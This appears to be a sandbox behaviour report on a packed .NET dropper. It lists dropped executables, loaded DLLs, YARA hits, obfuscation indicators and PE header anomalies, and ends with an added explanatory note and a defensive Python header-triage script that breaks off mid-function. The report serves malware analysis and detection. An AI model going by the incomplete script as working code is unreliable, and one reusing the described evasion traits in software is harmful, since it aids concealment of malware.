Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\zlONcFaXkc.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: zlONcFaXkc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: zlONcFaXkc.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: zlONcFaXkc.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: zlONcFaXkc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\weckb\source\repos\Hider\Hider\obj\x64\Release\Hider.pdb source: zcezeaqsuhi.exe, 00000002.00000000.1717795774.000002A5B9702000.00000002.00000001.01000000.00000008.sdmp, zcezeaqsuhi.exe, 00000002.00000002.2015898421.000002A5BB410000.00000002.00000001.00040000.00000008.sdmp, zcezeaqsuhi.exe.1.dr
Source: Binary string: mscorlib.pdb source: WERD304.tmp.dmp.9.dr
Source: Binary string: System.ni.pdbRSDS source: WERD304.tmp.dmp.9.dr
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9DD0000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1680370592.000001DFC1F10000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: Lwbtkgrhgw.pdb source: zlONcFaXkc.exe, 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB97BC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdb source: WERD304.tmp.dmp.9.dr
Source: Binary string: Hider.pdb source: WERD304.tmp.dmp.9.dr
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9DD0000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1680370592.000001DFC1F10000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WERD304.tmp.dmp.9.dr
Source: Binary string: protobuf-net.pdbSHA256}Lq source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERD304.tmp.dmp.9.dr
Source: Binary string: protobuf-net.pdb source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WERD304.tmp.dmp.9.dr
Source: Binary string: System.pdb source: WERD304.tmp.dmp.9.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERD304.tmp.dmp.9.dr
Source: Binary string: System.Core.ni.pdb source: WERD304.tmp.dmp.9.dr

Data Obfuscation

Source: zlONcFaXkc.exe, Program.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 0.2.zlONcFaXkc.exe.1dfb9cc2298.10.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.zlONcFaXkc.exe.1dfb9cc2298.10.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.zlONcFaXkc.exe.1dfb9cc2298.10.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.zlONcFaXkc.exe.1dfb9cc2298.10.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.zlONcFaXkc.exe.1dfb9cc2298.10.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9b593b8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9b31380.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9b593b8.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9c49428.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfc1c40000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9b31380.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1666984608.000001DFA9511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1675426228.000001DFC1C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.4116525327.000001D09B6C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: zlONcFaXkc.exe PID: 7316, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Target.exe PID: 7384, type: MEMORYSTR
Source: zlONcFaXkc.exe Static PE information: 0x89B686F2 [Fri Mar 20 05:04:50 2043 UTC]
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Code function: 0_2_00007FFD9B8AEF50 push cs; ret 0_2_00007FFD9B8AEF53
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Code function: 0_2_00007FFD9BA520A2 push eax; ret 0_2_00007FFD9BA520A3
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B8C6B00 push eax; iretd 1_2_00007FFD9B8C6DCD
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B8C6C69 push eax; iretd 1_2_00007FFD9B8C6DCD
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B8D8169 push ebx; ret 1_2_00007FFD9B8D816A
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B88EF50 push cs; ret 1_2_00007FFD9B88EF53
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9BA3792B push ebx; retf 1_2_00007FFD9BA3796A
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Code function: 2_2_00007FFD9B87095B push ebp; retf 2_2_00007FFD9B870961
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Code function: 2_2_00007FFD9B87126D push E95E53B6h; ret 2_2_00007FFD9B871299
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Code function: 2_2_00007FFD9B87096C push ebp; retf 2_2_00007FFD9B87096E
Source: zlONcFaXkc.exe Static PE information: section name: .text entropy: 7.997352220653475
Source: Target.exe.0.dr Static PE information: section name: .text entropy: 7.997352220653475
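The static facts listed in this section (COFF timestamp 0x89B686F2 resolving to 2043, image base 0x140000000, the DllCharacteristics flag set, CLR and DEBUG data directories, .text entropy 7.997) can be reproduced offline with a short header parser. The Python below is an added example written for this page; it is neither sandbox code nor code recovered from the sample. build_sample_pe() constructs a PE32+ stand-in whose header values mirror the report, and the 7.9 entropy threshold is the example's own heuristic. One caveat on the timestamp signature: the report reads the COFF TimeDateStamp literally, but deterministic .NET builds (the Roslyn default for SDK-style projects) store a content hash in that field, so a far-future date on a managed binary is weak evidence on its own; here it is corroborated by the near-8.0 .text entropy and the Assembly.Load(byte[]) call in Main.

```python
"""Static PE triage reproducing the report's checks for zlONcFaXkc.exe.
Added example; not sandbox code and not code from the sample. build_sample_pe()
is a hand-built PE32+ stand-in whose header values mirror the report, not the
real binary. PACKED_ENTROPY is this example's heuristic, not a sandbox constant."""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
    0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE",
}
DIR_DEBUG, DIR_COM_DESCRIPTOR = 6, 14      # IMAGE_DIRECTORY_ENTRY_* indices
PACKED_ENTROPY = 7.9                       # heuristic: close to 8.0 means encrypted/compressed


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the maximum (uniform byte distribution)."""
    if not data:
        return 0.0
    n = len(data)
    return 0.0 - sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage_pe(blob: bytes, now_ts=None) -> dict:
    """Parse only the headers needed to answer the report's static questions."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", blob, 0x3C)[0]                     # e_lfanew
    if blob[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    _machine, nsect, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, pe + 4)
    opt = pe + 24                                                     # optional header start
    pe32plus = struct.unpack_from("<H", blob, opt)[0] == 0x20B
    image_base = (struct.unpack_from("<Q", blob, opt + 24)[0] if pe32plus
                  else struct.unpack_from("<I", blob, opt + 28)[0])
    dllchars = struct.unpack_from("<H", blob, opt + 70)[0]            # same offset in PE32/PE32+
    ndirs = struct.unpack_from("<I", blob, opt + (108 if pe32plus else 92))[0]
    dirs = opt + (112 if pe32plus else 96)

    def dir_present(i: int) -> bool:
        if i >= ndirs:
            return False
        va, size = struct.unpack_from("<II", blob, dirs + 8 * i)
        return va != 0 and size != 0

    sections = []
    for i in range(nsect):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", blob, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "entropy": round(shannon_entropy(blob[raw_ptr:raw_ptr + raw_size]), 3)})

    if now_ts is None:
        now_ts = int(datetime.now(timezone.utc).timestamp())
    return {
        "timestamp": ts,
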